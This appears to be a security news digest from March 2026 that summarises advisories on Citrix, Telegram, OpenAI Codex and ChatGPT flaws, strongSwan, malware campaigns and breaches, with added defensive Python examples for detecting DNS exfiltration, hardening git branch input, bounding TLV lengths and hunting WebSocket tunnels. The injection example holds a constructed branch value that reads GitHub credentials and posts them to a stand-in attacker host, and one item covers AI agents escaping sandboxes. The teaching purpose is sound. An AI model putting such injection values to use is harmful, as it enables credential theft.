Vulnerabilities
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-3055 Citrix NetScaler Out-of-Bounds Read Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/03/30/cisa-adds-one-known-exploited-vulnerability-catalog
- When AI Trust Breaks: The ChatGPT Data Leakage Flaw That Redefined AI Vendor Security Trust
"AI assistants like ChatGPT have quickly become trusted environments for handling some of the most sensitive data people own. Users discuss medical symptoms, upload financial records, analyze contracts, and paste internal documents—often assuming that what they share remains safely contained within the platform. That assumption was challenged when new research uncovered a previously unknown vulnerability that enabled silent data leakage from ChatGPT conversations without user knowledge or consent. While the issue has since been fully resolved by OpenAI, the discovery delivers a much broader lesson for enterprises and security leaders: AI tools should not be assumed secure by default."
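The Register headline slug for this item describes the hidden channel as DNS data smuggling, which is the classic way for code that is allowed to resolve names but not to open sockets to get data out. As an added example for this digest (not Check Point's, OpenAI's or the researchers' code, and making no claim about how the runtime issue itself worked), here is the check a resolver-log owner would want: a heuristic that flags a client sending many distinct, long or high-entropy leftmost labels under one parent domain. The log layout, thresholds and every query below are constructed.

```python
"""Heuristic detector for data leaving a network inside DNS query names.

Added to this digest as an illustration; it is not Check Point's or OpenAI's code
and makes no claim about how the ChatGPT runtime issue actually worked. The log
layout (timestamp, client, query name) and every query below are constructed.
"""
import math
from collections import defaultdict

# Constructed resolver log. Client 10.0.0.7 sends hex-encoded chunks as the leftmost
# label of names under a single parent domain; the others are ordinary lookups.
SAMPLE_LOG = """\
1711780000 10.0.0.5 www.example.com
1711780001 10.0.0.5 api.github.com
1711780002 10.0.0.7 4a6f686e20446f65.2d2d.exfil.example.net
1711780003 10.0.0.7 3132332d34352d36373839.2d2d.exfil.example.net
1711780004 10.0.0.7 6d656469636174696f6e3a20696e73756c696e.exfil.example.net
1711780005 10.0.0.5 cdn.example.com
1711780006 10.0.0.7 5345435245542d544f4b454e.exfil.example.net
1711780007 10.0.0.9 mail.example.com
"""

# Thresholds are assumptions for the example; baseline them on your own resolver data.
MAX_LABEL_LEN = 24          # single-query check: ordinary hostnames rarely exceed this
MIN_ENTROPY = 3.2           # bits/char; hex, base32 and base64 chunks score high
LONG_MEAN_LABEL = 16        # group check: mean leftmost-label length
MIN_UNIQUE_SUBDOMAINS = 3   # group check: distinct leftmost labels per (client, parent)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_suspicious_label(label: str) -> bool:
    """Per-query check: a very long or high-entropy leftmost label."""
    return len(label) > MAX_LABEL_LEN or shannon_entropy(label) >= MIN_ENTROPY


def parse_log(text: str):
    """Yield (client, parent_domain, leftmost_label). The parent is approximated as the
    last two labels, good enough for a demo but not for public-suffix domains."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _ts, client, qname = parts
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:          # no subdomain, nothing to carry data in
            continue
        yield client, ".".join(labels[-2:]), labels[0]


def detect(text: str) -> list:
    """Group queries by (client, parent domain) and flag groups that look like a
    chunked transfer: many distinct leftmost labels that are long or high-entropy.
    Returns sorted (client, parent, unique_labels, mean_len, mean_entropy) tuples."""
    groups = defaultdict(set)
    for client, parent, first in parse_log(text):
        groups[(client, parent)].add(first)
    alerts = []
    for (client, parent), labels in groups.items():
        if len(labels) < MIN_UNIQUE_SUBDOMAINS:
            continue
        mean_len = sum(map(len, labels)) / len(labels)
        mean_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if mean_len >= LONG_MEAN_LABEL or mean_ent >= MIN_ENTROPY:
            alerts.append((client, parent, len(labels), round(mean_len, 1), round(mean_ent, 2)))
    return sorted(alerts)


if __name__ == "__main__":
    for client, parent, n, mean_len, mean_ent in detect(SAMPLE_LOG):
        print(f"{client} -> *.{parent}: {n} distinct labels, "
              f"mean len {mean_len}, mean entropy {mean_ent}")
```

The grouping matters more than any single-query rule: one long label is a CDN hash, a stream of distinct long labels from one client to one parent is a transfer. In a sandbox such as a code-execution runtime the stronger control is to give the workload no resolver at all and proxy the few names it legitimately needs.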
https://blog.checkpoint.com/research/when-ai-trust-breaks-the-chatgpt-data-leakage-flaw-that-redefined-ai-vendor-security-trust/
https://research.checkpoint.com/2026/chatgpt-data-leakage-via-a-hidden-outbound-channel-in-the-code-execution-runtime/
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html
https://www.theregister.com/2026/03/30/openai_chatgpt_dns_data_snuggling_flaw/
- Storm Brews Over Critical, No-Click Telegram Flaw
"A storm is brewing over a purported critical Telegram Messenger flaw that allows for full system hijack, with full details of the unpatched vulnerability not set to be disclosed until July. The vulnerability, which could impact some 1 billion users of the popular chat app, was discovered by researcher Michael DePlante of the Trend Micro Zero Day Initiative (ZDI). ZDI first revealed the existence of the flaw, which it tracks as ZDI-CAN-30207, on Thursday and set a deadline for full disclosure on July 26."
https://www.darkreading.com/application-security/storm-brews-critical-no-click-telegram-flaw
https://securityaffairs.com/190167/security/its-a-mystery-alleged-unpatched-telegram-zero-day-allows-device-takeover-but-telegram-denies.html
- How Command Injection Vulnerability In OpenAI Codex Leads To GitHub Token Compromise
"BeyondTrust Phantom Labs has discovered a critical command injection vulnerability in OpenAI's Codex cloud environment that exposed sensitive GitHub credential data. The vulnerability exists within the task creation HTTP request, which allows an attacker to inject arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub. Through automated techniques, this exploit can scale to compromise multiple users interacting with a shared environment or GitHub repository. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been remediated in coordination with OpenAI’s security team."
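A branch name is a classic injection sink because it is user-controlled, looks harmless, and usually ends up inside a git command line. The example below is added for this digest to show the bug class beside its fix; it is not OpenAI's Codex code, does not reproduce the actual request, payload or remediation, and never runs git. The request shape, the helper names and the hostile value are assumptions for the example.

```python
"""Command injection through a git branch name, beside the hardened form.

Added illustration of the bug class in the BeyondTrust item. It is not OpenAI's
Codex code, does not reproduce the actual request, payload or fix, and never runs
git: the functions only build the command so the two forms can be compared. The
request shape, helper names and the hostile value are assumptions for the example.
"""
import re
import shlex

# Constructed task request as a client might submit it.
TASK_REQUEST = {"repo": "https://github.com/example/app.git", "branch": "feature/login"}

# Constructed hostile branch value. Fed to a shell, the ';' ends the git command and the
# rest runs as a second command; the file path and host are made up for the example.
HOSTILE_BRANCH = "main; cat ~/.config/gh/hosts.yml | curl -d @- https://attacker.example/"


def build_clone_unsafe(request: dict) -> str:
    """Vulnerable form: untrusted input interpolated into a string destined for a shell
    (the equivalent of subprocess.run(cmd, shell=True) or os.system(cmd))."""
    return f"git clone --branch {request['branch']} {request['repo']} work"


def shell_tokens(cmd: str) -> list:
    """How a POSIX shell would tokenize cmd, with ';' and '|' as separate operators.
    Diagnostic only; nothing is executed."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


# Allow-list in the spirit of `git check-ref-format --branch`: a restricted character
# set plus the structural rules git enforces. Shell metacharacters are rejected because
# they are outside the allow-list, not because of a deny-list that can be bypassed.
_REF_CHARS = re.compile(r"^[A-Za-z0-9._/-]+$")


def is_valid_branch(name: str) -> bool:
    if not name or len(name) > 255 or not _REF_CHARS.match(name):
        return False
    if name.startswith(("-", "/")) or name.endswith(("/", ".", ".lock")):
        return False
    if ".." in name or "//" in name:
        return False
    return not any(part.startswith(".") or part.endswith(".lock") for part in name.split("/"))


def build_clone_safe(request: dict) -> list:
    """Hardened form: validate, pass argv as a list so no shell parses it, and end option
    parsing with '--' so the repository argument cannot be read as a git flag.
    Run as subprocess.run(build_clone_safe(req), check=True)."""
    branch = request["branch"]
    if not is_valid_branch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "clone", "--branch", branch, "--", request["repo"], "work"]


if __name__ == "__main__":
    hostile = dict(TASK_REQUEST, branch=HOSTILE_BRANCH)
    print(shell_tokens(build_clone_unsafe(hostile)))
    print(build_clone_safe(TASK_REQUEST))
    try:
        build_clone_safe(hostile)
    except ValueError as err:
        print(err)
```

Two controls stack here: the argv list removes the shell, so metacharacters stop being operators, and the allow-list keeps git itself from being handed a value it would interpret (a leading dash, `..`, a `.lock` suffix). The token the write-up describes as the prize is the same one the clone step needs, so least privilege on that token (short-lived, scoped to the one repository) limits what a successful injection is worth.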
https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token
https://hackread.com/openai-codex-vulnerability-steal-github-tokens/
- StrongSwan CVE-2026-25075: Integer Underflow In VPN Authentication
"Bishop Fox researchers successfully exploited an integer underflow vulnerability affecting the EAP-TTLS plugin in strongSwan versions 4.5.0 through 6.0.4. The vulnerability allows remote, unauthenticated attackers to crash the VPN server's IKE daemon through a carefully crafted EAP-TTLS message, resulting in denial of service. What makes this vulnerability particularly interesting is that exploitation often requires a two-phase attack. In some scenarios, a single malicious packet corrupts the heap but doesn't crash the daemon; only a second connection triggers the segmentation fault. Our researchers also developed a safe detection method that identifies vulnerable servers without causing any disruption, which you can download here."
https://bishopfox.com/blog/strongswan-cve-2026-25075-integer-underflow-in-vpn-authentication
https://hackread.com/strongswan-flaw-attackers-crash-vpn-integer-underflow/
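To make the bug class in the Bishop Fox item concrete, here is an added example written for this digest and not taken from strongSwan or Bishop Fox: a parser for EAP-TTLS AVP framing (RFC 5281: 4-byte Code, 1-byte Flags, 3-byte Length that counts the header itself, optional 4-byte Vendor-ID, then Data padded to 4 bytes) in which the data length is derived by subtracting the header size from the declared length. The unchecked version shows the subtraction wrapping when a message declares a Length smaller than its own header, the way unsigned arithmetic does in C; the checked version rejects it. The AVP layout is the RFC's, but the parser, the AVP code and the crafted message are assumptions for the example, and nothing here reproduces the actual CVE-2026-25075 defect or the detection script the post mentions.

```python
"""Integer underflow in a length-prefixed (TLV) parser, and the checked form.

Added illustration, not strongSwan's code and not the actual CVE-2026-25075 defect.
Framing follows the EAP-TTLS AVP layout of RFC 5281 (Code 4 bytes, Flags 1 byte,
Length 3 bytes covering the header, optional Vendor-ID 4 bytes, then Data, padded
to 4 bytes). The AVP code, flags and messages below are constructed for the example.
"""
import struct

AVP_HDR_LEN = 8          # Code + Flags + Length
VENDOR_LEN = 4
FLAG_VENDOR = 0x80       # 'V' bit: a Vendor-ID follows the Length field
U32_MASK = 0xFFFFFFFF    # emulate C's uint32_t wraparound in Python
EAP_MESSAGE = 79         # AVP code used in the samples (RADIUS EAP-Message)


def build_avp(code: int, data: bytes, vendor_id=None) -> bytes:
    """Encode one well-formed AVP with RFC 5281 padding."""
    flags = FLAG_VENDOR if vendor_id is not None else 0
    body = (struct.pack(">I", vendor_id) if vendor_id is not None else b"") + data
    length = AVP_HDR_LEN + len(body)
    avp = struct.pack(">IB", code, flags) + length.to_bytes(3, "big") + body
    return avp + b"\x00" * (-len(avp) % 4)


# Constructed benign message: two AVPs, the second carrying a Vendor-ID.
BENIGN = build_avp(EAP_MESSAGE, b"\x01\x02\x03") + build_avp(1, b"ab", vendor_id=0x1234)

# Constructed hostile AVP: header only, declared Length = 4, smaller than the 8-byte header.
CRAFTED = struct.pack(">IB", EAP_MESSAGE, 0) + (4).to_bytes(3, "big")


def parse_avp_unchecked(buf: bytes, off: int = 0):
    """Vulnerable pattern: data_len = length - header with no lower-bound check.
    Returns (code, data_len, data); in C, data_len would then size a copy or a read."""
    code, flags = struct.unpack_from(">IB", buf, off)
    length = int.from_bytes(buf[off + 5:off + 8], "big")
    hdr = AVP_HDR_LEN + (VENDOR_LEN if flags & FLAG_VENDOR else 0)
    data_len = (length - hdr) & U32_MASK          # wraps to ~4 GiB when length < hdr
    return code, data_len, buf[off + hdr:off + hdr + data_len]


def parse_avps_checked(buf: bytes) -> list:
    """Hardened pattern: every Length is bounded below by its header size and above by
    the bytes that remain. Returns [(code, data), ...] or raises ValueError."""
    avps, off = [], 0
    while off < len(buf):
        remaining = len(buf) - off
        if remaining < AVP_HDR_LEN:
            raise ValueError("truncated AVP header")
        code, flags = struct.unpack_from(">IB", buf, off)
        length = int.from_bytes(buf[off + 5:off + 8], "big")
        hdr = AVP_HDR_LEN + (VENDOR_LEN if flags & FLAG_VENDOR else 0)
        if length < hdr:                      # the underflow guard
            raise ValueError(f"AVP length {length} < header {hdr}")
        if length > remaining:                # the over-read guard
            raise ValueError(f"AVP length {length} > {remaining} bytes remaining")
        avps.append((code, buf[off + hdr:off + length]))
        off += (length + 3) & ~3              # skip padding to the next 4-byte boundary
    return avps


def is_well_formed(buf: bytes) -> bool:
    try:
        parse_avps_checked(buf)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_avp_unchecked(CRAFTED)[1])    # the wrapped length, 4294967292
    print(is_well_formed(CRAFTED))            # False
    print(parse_avps_checked(BENIGN))
```

The write-up's observation that a first packet can corrupt the heap without crashing, with the fault only on a later connection, is exactly what a wrapped length produces: the over-sized copy or read lands in whatever happens to be adjacent, and the damage surfaces when that memory is next used. Both guards are needed; checking only against the remaining buffer still lets a Length below the header size through.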
Malware
- Critical Fortinet Forticlient EMS Flaw Now Exploited In Attacks
"Attackers are now actively exploiting a critical vulnerability in Fortinet's FortiClient EMS platform, according to threat intelligence company Defused. Tracked as CVE-2026-21643, this SQL injection vulnerability allows unauthenticated threat actors to execute arbitrary code or commands on unpatched systems through low-complexity attacks targeting the FortiClientEMS GUI (web interface) via maliciously crafted HTTP requests. "Fortinet Forticlient EMS CVE-2026-21643 - currently marked as not exploited on CISA and other Known Exploited Vulnerabilities (KEV) lists - has seen first exploitation already 4 days ago according to our data," Defused warned over the weekend."
https://www.bleepingcomputer.com/news/security/critical-fortinet-forticlient-ems-flaw-now-exploited-in-attacks/
https://securityaffairs.com/190158/security/critical-fortinet-forticlient-ems-flaw-exploited-for-remote-code-execution.html
https://www.helpnetsecurity.com/2026/03/30/forticlient-ems-cve-2026-21643-reported-exploitation/
- Hacked Hospitals, Hidden Spyware: Iran Conflict Shows How Digital Fight Is Ingrained In Warfare
"As they fled an Iranian missile strike, some Israelis with Android phones received a text offering a link to real-time information about bomb shelters. But instead of a helpful app, the link downloaded spyware giving hackers access to the device’s camera, location and all its data. The operation, attributed to Iran, showed sophisticated coordination and is just the latest tactic in a cyber conflict that pits the U.S. and Israel against Iran and its digital proxies. As Iran and its supporters seek to use their cyber capabilities to compensate for their military disadvantages, they are demonstrating how disinformation, artificial intelligence and hacking are now ingrained in modern warfare."
https://www.securityweek.com/hacked-hospitals-hidden-spyware-iran-conflict-shows-how-digital-fight-is-ingrained-in-warfare/
- Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework
"“CTRL” is a custom-built .NET remote access toolkit developed by a Russian-speaking operator and distributed via weaponized LNK files disguised as private key folders. The toolkit was discovered through Censys open directory scanning, which identified an exposed payload hosting directory at hui228.ru:82/hosted/ containing three .NET executables. Together, the executables provide encrypted payload loading, credential harvesting via a polished Windows Hello phishing UI, keylogging, RDP session hijacking, and reverse proxy tunneling through FRP."
https://censys.com/blog/under-ctrl-dissecting-a-previously-undocumented-russian-net-access-framework/
https://thehackernews.com/2026/03/russian-ctrl-toolkit-delivered-via.html
- RoadK1ll: A WebSocket Based Pivoting Implant
"During analysis of a recent intrusion, the Blackpoint Response Operations Center (BROC) identified a Node.js based implant deployed within the compromised environment which the BROC is tracking as RoadK1ll. At a glance, it might not look like your typical piece of malware, as there are no large command sets or obvious operator tooling built in. Instead, RoadK1ll is built to solve a very specific problem for the attacker: maintaining reliable, flexible access into an internal network after initial compromise. RoadK1ll is a Node.js-based reverse tunneling implant that establishes an outbound WebSocket connection to attacker-controlled infrastructure and uses that connection to broker TCP traffic on demand. Unlike a traditional remote access trojan, it carries no large command set and requires no inbound listener on the victim host."
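An implant like this leaves little on disk to scan for, but its network shape is distinctive: a completed WebSocket upgrade from an unexpected process to a non-allowlisted endpoint that stays up for hours and is re-dialled after drops. The example below is added for this digest as a generic hunting check over outbound HTTP records; it is not Blackpoint's detection logic, and the record layout, hosts, processes, ports and durations are all constructed.

```python
"""Hunting for a RoadK1ll-style reverse WebSocket tunnel in outbound HTTP records.

Added to this digest as a generic check for the behaviour the Blackpoint write-up
describes: an outbound WebSocket to attacker infrastructure that stays up and is
reused to broker TCP. It is not Blackpoint's detection logic, and the record layout,
hosts, processes, ports and durations are all constructed for the example.
"""
import ipaddress
from collections import defaultdict

# Constructed records: ts src_host process dst_host dst_port upgrade status duration_s
# ("-" in the upgrade column means no Upgrade header was sent).
RECORDS = """\
1711780000 ws-011   chrome.exe teams.example.com        443  websocket 101 5400
1711780005 ws-011   chrome.exe cdn.example.com          443  -         200 1
1711780010 srv-db2  node.exe   198.51.100.23            8443 websocket 101 86400
1711866410 srv-db2  node.exe   198.51.100.23            8443 websocket 101 43200
1711909610 srv-db2  node.exe   198.51.100.23            8443 websocket 101 600
1711780020 ws-014   slack.exe  wss-primary.slack.com    443  websocket 101 7200
1711780030 srv-app1 node.exe   api.internal.example.com 443  -         200 2
"""

ALLOWED_WS_HOSTS = {"teams.example.com", "wss-primary.slack.com"}  # assumed allowlist
LONG_SESSION_S = 3600     # a brokering tunnel stays up; so do chat clients, hence the allowlist
MIN_RECONNECTS = 2        # implants re-dial the same endpoint after a drop


def parse_records(text: str) -> list:
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) != 8:
            continue
        rows.append({
            "ts": int(f[0]), "src": f[1], "proc": f[2], "dst": f[3], "port": int(f[4]),
            "upgrade": f[5], "status": int(f[6]), "duration_s": int(f[7]),
        })
    return rows


def websocket_sessions(rows: list) -> list:
    """Only completed upgrades count: Upgrade: websocket answered with 101."""
    return [r for r in rows if r["upgrade"] == "websocket" and r["status"] == 101]


def is_bare_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_suspect_tunnels(rows: list) -> list:
    """Return [((src, proc, dst, port), [reasons...]), ...] for non-allowlisted
    WebSocket endpoints that look like a persistent tunnel rather than a page visit."""
    by_endpoint = defaultdict(list)
    for r in websocket_sessions(rows):
        if r["dst"] in ALLOWED_WS_HOSTS:
            continue
        by_endpoint[(r["src"], r["proc"], r["dst"], r["port"])].append(r)

    findings = []
    for key, sessions in by_endpoint.items():
        reasons = []
        longest = max(s["duration_s"] for s in sessions)
        if longest >= LONG_SESSION_S:
            reasons.append(f"long-lived session ({longest}s)")
        if len(sessions) >= MIN_RECONNECTS:
            reasons.append(f"{len(sessions)} connections to the same endpoint")
        if is_bare_ip(key[2]):
            reasons.append("destination is a bare IP, not a hostname")
        if key[1].lower().startswith("node"):
            # RoadK1ll is Node.js-based; treat this as weighting, not as a verdict
            reasons.append("initiated by a Node.js process")
        if reasons:
            findings.append((key, reasons))
    return sorted(findings)


if __name__ == "__main__":
    for (src, proc, dst, port), reasons in find_suspect_tunnels(parse_records(RECORDS)):
        print(f"{src} {proc} -> {dst}:{port}: " + "; ".join(reasons))
```

The allowlist is doing real work: long-lived WebSockets are normal for chat and collaboration clients, so the signal is the combination of endpoint, originating process and persistence, not any one of them. The same logic applies to an EDR telemetry export or a proxy log once the fields are mapped.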
https://blackpointcyber.com/blog/roadk1ll-a-websocket-based-pivoting-implant/
https://www.bleepingcomputer.com/news/security/new-roadk1ll-websocket-implant-used-to-pivot-on-breached-networks/
- One Click Away: Inside a LinkedIn Phishing Attack
"You’re checking your inbox like any other day when a LinkedIn notification pops up, hinting at a promising opportunity. It feels exciting and completely normal to click. Yet with that single action, your login credentials may already be slipping into the hands of a cybercriminal. This is the danger hiding in plain sight: phishing emails that look so ordinary they disarm even the most cautious users. A moment of curiosity or urgency is all it takes for an attack to succeed. This is consistent with a recent trend observed by the Cofense Phishing Defense Center (PDC). The analysts in the PDC have identified a phishing campaign that uses LinkedIn message notifications to lure users into logging in to view a supposed opportunity, ultimately disguising itself to steal users’ credentials."
https://cofense.com/blog/one-click-away-inside-a-linkedin-phishing-attack
- DeepLoad Malware Pairs ClickFix Delivery With AI-Generated Evasion
"ReliaQuest has observed the new “DeepLoad” malware being exploited in enterprise environments. What sets this campaign apart isn’t any single stand-out technique, but how the entire attack chain was engineered to defeat the controls most organizations rely on, turning one user action into persistent, credential-stealing access. In this report, we provide a full attack chain for DeepLoad, showing that newly surfaced threats can arrive operationally mature. Based on what we’ve observed, organizations must prioritize behavioral, runtime detection—not file-based scanning—to catch this campaign (and similar ones) early."
https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion/
https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
https://www.darkreading.com/cyberattacks-data-breaches/ai-powered-deepload-steals-credentials-evades-detection
https://cyberscoop.com/deepload-ai-malware-obfuscation-at-every-stage-reliaquest/
https://www.infosecurity-magazine.com/news/deepload-malware-clickfix-ai-code/
- Professional Networks Under Attack: Vietnam-Linked Actors Deploy PXA Stealer In Global Infostealer Campaign
"CRIL has been actively tracking a surge in PXA Stealer activity deployed in a sophisticated, financially motivated threat campaign attributed with high confidence to a Vietnam-based cybercriminal group. The primary targets in this campaign are job seekers across India, Bangladesh, the Netherlands, Sweden, and the United States. Threat actors leverage LinkedIn as their primary initial access vector, distributing fraudulent recruitment messages via compromised accounts that impersonate legitimate job opportunities."
https://cyble.com/blog/professional-networks-under-attack-by-infostealer/
Breaches/Hacks/Leaks
- Healthcare Tech Firm CareCloud Says Hackers Stole Patient Data
"Healthcare IT firm CareCloud has disclosed a data breach incident that exposed sensitive data and caused a network disruption lasting approximately eight hours. The New Jersey-based company said in a filing with the U.S. Securities and Exchange Commission (SEC) that the intrusion occurred on March 16 when hackers accessed its IT infrastructure. “On March 16, 2026, CareCloud, Inc. experienced a temporary network disruption in its CareCloud Health division that partially impacted the functionality and data access to 1 of its 6 electronic health record environments for approximately 8 hours until the Company fully restored all functionality and data access during that evening,” the company says in the SEC filing."
https://www.bleepingcomputer.com/news/security/healthcare-tech-firm-carecloud-says-hackers-stole-patient-data/
https://therecord.media/carecloud-hack-data-breach-sec
https://www.securityweek.com/healthcare-it-platform-carecloud-probing-potential-data-breach/
- Dark Web Market Lists Alleged 375TB Lockheed Martin Data For $600M
"Hackers are claiming to have stolen a trove of data belonging to Lockheed Martin, the world’s largest defense contractor and an American aerospace company. They are now selling it on the dark web. The situation began on March 26, 2026, when a Telegram account linked to a dark web marketplace known as Threat Market, which posts in both Russian and English, claimed it had been approached by a group described as “APT IRAN.” According to the post, the group requested infrastructure support to sell what was described as 375 terabytes of data allegedly taken from Lockheed Martin."
https://hackread.com/dark-web-market-375tb-lockheed-martin-data/
General News
- Why Risk Alone Doesn’t Get You To Yes
"I have been in security rooms for years, from military operations centers to corporate boardrooms. In all those years I can tell you that the hardest mission that most security leaders will face is not identifying a threat, but getting someone to act on it. We’re trained to see exposures before they are identified by others. We continually assess likely threats, evaluate impact, and design controls to prevent disruption long before it reaches operations or shareholders. That’s the job. But here’s what I’ve watched happen, over and over again: a security leader walks into a meeting with a technically sound brief, well-supported recommendations, and a clear picture of the risk. The room nods. The CFO asks for more context. The conversation gets tabled for next quarter."
https://www.helpnetsecurity.com/2026/03/30/cyber-security-executive-buy-in/
- Breaking Out: Can AI Agents Escape Their Sandboxes?
"Container sandboxes are part of routine AI agent testing and deployment. Agents use them to run code, edit files, and interact with system resources without direct access to the host. The SandboxEscapeBench benchmark, developed by researchers at the University of Oxford and the AI Security Institute, evaluates whether an agent with shell access can escape a container and reach the host system."
https://www.helpnetsecurity.com/2026/03/30/ai-agents-container-breakout-capabilities-research/
https://arxiv.org/pdf/2603.02277
- Don’t Count On Government Guidance After a Smart Home Breach
"People are filling their homes with internet-connected cameras, speakers, locks, and routers. When one of those devices is compromised, the next steps are often unclear. Researchers reviewing government cybersecurity advice in 11 countries found that most guidance focuses on prevention, leaving households with limited support after a breach. The analysis covers Australia, Austria, Canada, Finland, France, Germany, Japan, New Zealand, Singapore, the United Kingdom, and the United States."
https://www.helpnetsecurity.com/2026/03/30/smart-home-cybersecurity-recovery-guidance-gap/
- Iranian Cyberthreats Test US Infrastructure Defenses
"Warnings from Iranian-linked hacking groups threatening "irreparable damages" to U.S. water systems are raising concerns across the federal cybersecurity community - as officials weigh both the credibility of the threat and the government's ability to respond amid ongoing cyber resource strains. The reported threat involves a coalition of pro-Iranian hacking groups signaling potential retaliation against U.S. critical infrastructure - including water and wastewater systems - if geopolitical tensions continue to escalate."
https://www.bankinfosecurity.com/iranian-cyberthreats-test-us-infrastructure-defenses-a-31299
- Hybrid Warfare 2026: When Cyber Operations And Kinetic Attacks Converge
"In 2026, hybrid warfare is no longer a theoretical construct discussed in policy circles; it is shaping geopolitical conflict in real time. The convergence of cyber warfare and kinetic attacks has transformed how nations project power, blending missiles, malware, and misinformation into unified campaigns. What distinguishes modern hybrid warfare from earlier conflicts is not just the presence of digital operations, but their synchronization with physical strikes to produce layered, systemic disruption. Nowhere is this more evident than in the Middle East, where escalating tensions have turned the region into a proving ground for cyber-physical warfare."
https://cyble.com/blog/hybrid-warfare-2026-cyber-kinetic-threats/
- Manufacturing And Healthcare Share Struggles With Passwords
"Two disparate industries, manufacturing and healthcare, share several weaknesses that lead to significant security gaps, especially in password hygiene. Addressing this in the short term will require shifting security culture mindsets. The industries are two of the biggest ransomware targets. Black Kite's "2025 Manufacturing Research Report" found that manufacturing was the No. 1 target for ransomware groups four years in a row."
https://www.darkreading.com/cyber-risk/manufacturing-and-healthcare-share-struggles-with-passwords
- TeamPCP’s Attack Spree Slows, But Threat Escalates With Ransomware Pivot
"TeamPCP’s destructive run of supply chain breaches has stopped, for now: it has been three days since the group published malicious versions of Telnyx’s SDK on PyPI, and there haven’t been reports of new open-source project compromises."
https://www.helpnetsecurity.com/2026/03/30/teampcp-supply-chain-attacks-ransomware/
- Silent Drift: How LLMs Are Quietly Breaking Organizational Access Control
"Business efficiency demands maximum use of AI assistance, but where policy as code is concerned, AI can introduce serious policy flaws. The shift to policy as code for organizational security, compliance, and operational rules is being followed by increased use of LLM artificial intelligence to help produce the raw code. This makes sense. A primary purpose of AI within business is to improve human efficiency, and writing policy in languages like Rego or Cedar is not easy. AI is increasingly used to streamline the process."
https://www.securityweek.com/silent-drift-how-llms-are-quietly-breaking-organizational-access-control/
- Audit Finds Application Security Issues Are Worse Than Ever
"An audit of 947 commercial codebases spanning 17 industries finds the number of vulnerabilities inside applications has surged a startling 107% over the past year. Conducted by Black Duck Software, the audit also finds there are now, on average, 581 vulnerabilities per codebase. Alas, many of these vulnerabilities can be traced back to open-source software components that create dependencies in code bases that are challenging to fix because the code is managed by an independent maintainer that might not yet have created a patch to address the issue."
https://blog.barracuda.com/2026/03/30/audit-application-security-issues-open-source
References
Electronic Transactions Development Agency (ETDA)

ThaiCERT advises organizations using Citrix products to check their systems and apply the patch immediately, to guard against the risk of data leakage and unauthorized access to systems.